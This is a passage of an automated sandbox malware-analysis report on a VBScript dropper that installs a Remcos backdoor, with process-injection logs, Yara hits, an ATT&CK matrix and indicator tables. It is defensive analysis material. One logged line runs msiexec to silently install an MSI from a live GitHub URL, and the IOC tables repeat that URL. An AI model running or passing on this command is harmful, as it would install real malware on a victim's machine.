                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeNtAllocateVirtualMemory: Direct from: 0x62EABF8DJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeNtAllocateVirtualMemory: Direct from: 0x6AD24AC4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeNtAllocateVirtualMemory: Direct from: 0x62EAD477Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtProtectVirtualMemory: Direct from: 0x4013A8Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtCreateFile: Direct from: 0x62EA6806Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtUnmapViewOfSection: Direct from: 0x62EB40A6Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtUnmapViewOfSection: Direct from: 0x62EA676AJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtQueryInformationProcess: Direct from: 0x62EB5025Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtAllocateVirtualMemory: Direct from: 0x62EBB3D6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeNtQuerySystemInformation: Direct from: 0x6AD25C3EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeNtCreateFile: Direct from: 0x6AD23B31Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeNtQueryInformationProcess: Direct from: 0x62EB1047Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtReadVirtualMemory: Direct from: 0x62EA8D6FJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtWriteVirtualMemory: Direct from: 0x62EBBF48Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtProtectVirtualMemory: Direct from: 0x62EB2791Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtReadVirtualMemory: Direct from: 0x62EAA88EJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtAllocateVirtualMemory: Direct from: 0x62EA530EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeNtQueryInformationToken: Direct from: 0x62EB6504Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeNtProtectVirtualMemory: Direct from: 0x62EAB264Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtAllocateVirtualMemory: Direct from: 0x62EB5A71Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtAllocateVirtualMemory: Direct from: 0x62EB0A1EJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtProtectVirtualMemory: Direct from: 0x62EA3DA1Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtSuspendThread: Direct from: 0x62EA9819Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtAllocateVirtualMemory: Direct from: 0x62EAC69CJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeNtWriteVirtualMemory: Direct from: 0x62EA8A84Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeNtDelayExecution: Direct from: 0x6AD2401DJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 24A0000 value starts with: 4D5AJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 24A0000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 22C9008Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 6AD21000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 410000Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 400000Jump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 266B008Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 6AD21000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe base: 410000Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi /qnJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe "C:\Windows\System32\WerFault.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe C:\Users\user\AppData\Local\Temp\EHttpSrv.exeJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00402404 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00402404
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2043D840 GetVersionExW,6_2_2043D840
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 7.3.Updwork.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.23c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2930000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.WerFault.exe.24a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2980000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.WerFault.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Updwork.exe PID: 6032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RaftelibeGasrss.exe PID: 4416, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 5504, type: MEMORYSTR
                      Source: Yara matchFile source: 7.3.Updwork.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.23c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2930000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.WerFault.exe.24a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2980000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.WerFault.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Updwork.exe PID: 6032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RaftelibeGasrss.exe PID: 4416, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 5504, type: MEMORYSTR
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 7.3.Updwork.exe.23c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.23c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.Updwork.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2930000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.WerFault.exe.24a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2980000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2980000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.3.RaftelibeGasrss.exe.2930000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.WerFault.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Updwork.exe PID: 6032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RaftelibeGasrss.exe PID: 4416, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 5504, type: MEMORYSTR
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.cmd.exe.59c00c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.cmd.exe.51900c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2756412982.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3260, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EHttpSrv.exe PID: 6104, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yljutqdulam, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dsx, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information221
                      Scripting
                      1
                      Replication Through Removable Media
                      2
                      Native API
                      221
                      Scripting
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Disable or Modify Tools
                      11
                      Input Capture
                      1
                      System Time Discovery
                      1
                      Software Deployment Tools
                      11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      11
                      DLL Side-Loading
                      11
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory11
                      Peripheral Device Discovery
                      Remote Desktop Protocol11
                      Input Capture
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts12
                      Service Execution
                      14
                      Windows Service
                      1
                      Access Token Manipulation
                      1
                      Abuse Elevation Control Mechanism
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Clipboard Data
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Software Deployment Tools
                      1
                      Registry Run Keys / Startup Folder
                      14
                      Windows Service
                      4
                      Obfuscated Files or Information
                      NTDS216
                      System Information Discovery
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script411
                      Process Injection
                      11
                      DLL Side-Loading
                      LSA Secrets1
                      Query Registry
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Registry Run Keys / Startup Folder
                      1
                      File Deletion
                      Cached Domain Credentials411
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                      Masquerading
                      DCSync12
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                      Virtualization/Sandbox Evasion
                      Proc Filesystem1
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron411
                      Process Injection
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565487 Sample: secondaryTask.vbs Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 69 185.157.162.126 OBE-EUROPEObenetworkEuropeSE Sweden 2->69 71 shed.dual-low.s-part-0035.t-0009.t-msedge.net 2->71 73 6 other IPs or domains 2->73 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus detection for dropped file 2->83 85 10 other signatures 2->85 9 msiexec.exe 23 48 2->9         started        13 RaftelibeGasrss.exe 11 2->13         started        16 EHttpSrv.exe 1 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 75 github.com 20.233.83.145, 443, 49707 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 9->75 77 raw.githubusercontent.com 185.199.108.133, 443, 49709 FASTLYUS Netherlands 9->77 61 C:\Windows\Installer\MSI3C7A.tmp, PE32 9->61 dropped 63 C:\Windows\Installer\MSI3C5A.tmp, PE32 9->63 dropped 65 C:\Windows\Installer\MSI3C2A.tmp, PE32 9->65 dropped 67 6 other files (4 malicious) 9->67 dropped 20 Updwork.exe 18 9->20         started        24 EHttpSrv.exe 1 9->24         started        26 msiexec.exe 9->26         started        107 Writes to foreign memory regions 13->107 109 Allocates memory in foreign processes 13->109 111 Tries to detect virtualization through RDTSC time measurements 13->111 121 3 other signatures 13->121 28 WerFault.exe 13->28         started        113 Maps a DLL or memory area into another process 16->113 30 cmd.exe 2 16->30         started        115 VBScript performs obfuscated calls to suspicious functions 18->115 117 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->117 119 Installs a MSI (Microsoft Installer) remotely 18->119 32 cmd.exe 4 18->32         started        34 cmd.exe 1 18->34         started        36 msiexec.exe 18->36         started        file6 signatures7 process8 file9 55 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 20->55 dropped 87 Antivirus detection for dropped file 20->87 89 Multi AV Scanner detection for dropped file 20->89 91 Writes to foreign memory regions 20->91 99 4 other signatures 20->99 38 WerFault.exe 20->38         started        93 Found API chain indicative of debugger detection 24->93 95 Maps a DLL or memory area into another process 24->95 97 Switches to a custom stack to bypass stack traces 24->97 40 cmd.exe 1 24->40         started        57 C:\Users\user\AppData\Local\Temp\dsx, PE32 30->57 dropped 43 EHttpSrv.exe 30->43         started        45 conhost.exe 30->45         started        59 C:\Users\user\AppData\Local\...\yljutqdulam, PE32 32->59 dropped 47 EHttpSrv.exe 32->47         started        49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        signatures10 process11 signatures12 101 Found hidden mapped module (file has been removed from disk) 40->101 103 Switches to a custom stack to bypass stack traces 40->103 53 conhost.exe 40->53         started        105 Found direct / indirect Syscall (likely to bypass EDR) 43->105 process13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      secondaryTask.vbs8%ReversingLabsScript-WScript.Backdoor.Remcos
                      secondaryTask.vbs6%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\http_dll.dll100%AviraTR/HijackLoader.cugkp
                      C:\Users\user\AppData\Local\Temp\dsx100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\Updwork.exe100%AviraHEUR/AGEN.1338067
                      C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll100%AviraHEUR/AGEN.1363590
                      C:\Users\user\AppData\Local\Temp\yljutqdulam100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\dsx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\yljutqdulam100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\EHttpSrv.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dll46%ReversingLabsWin32.Trojan.Nekark
                      C:\Users\user\AppData\Local\Temp\Updwork.exe37%ReversingLabsWin32.Infostealer.Tinba
                      C:\Users\user\AppData\Local\Temp\dsx89%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\http_dll.dll62%ReversingLabsWin32.Trojan.HijackLoader
                      C:\Users\user\AppData\Local\Temp\mfc80u.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\msvcr80.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\yljutqdulam89%ReversingLabsWin32.Backdoor.Remcos
                      C:\Windows\Installer\MSI3BAC.tmp0%ReversingLabs
                      C:\Windows\Installer\MSI3C2A.tmp0%ReversingLabs
                      C:\Windows\Installer\MSI3C5A.tmp0%ReversingLabs
                      C:\Windows\Installer\MSI3C7A.tmp0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        high
                        github.com
                        20.233.83.145
                        truefalse
                          high
                          raw.githubusercontent.com
                          185.199.108.133
                          truefalse
                            high
                            s-part-0035.t-0009.t-msedge.net
                            13.107.246.63
                            truefalse
                              high
                              fp2e7a.wpc.phicdn.net
                              192.229.221.95
                              truefalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msifalse
                                  high
                                  https://raw.githubusercontent.com/Kroby5444/Jim/refs/heads/main/Slf.msifalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi1630105376311466440~DF5F00B5FE69ED3BD9.TMP.3.drfalse
                                      high
                                      http://nsis.sf.net/NSIS_ErrorUpdwork.exe, Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drfalse
                                        high
                                        http://www.vmware.com/0EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.zlib.net/Updwork.exe, Updwork.exe, 00000007.00000000.2277568038.0000000000438000.00000002.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588325124.0000000000438000.00000002.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drfalse
                                            high
                                            ftp://http://HTTP/1.0EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.drfalse
                                              high
                                              https://www.thawte.com/cps0/MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drfalse
                                                high
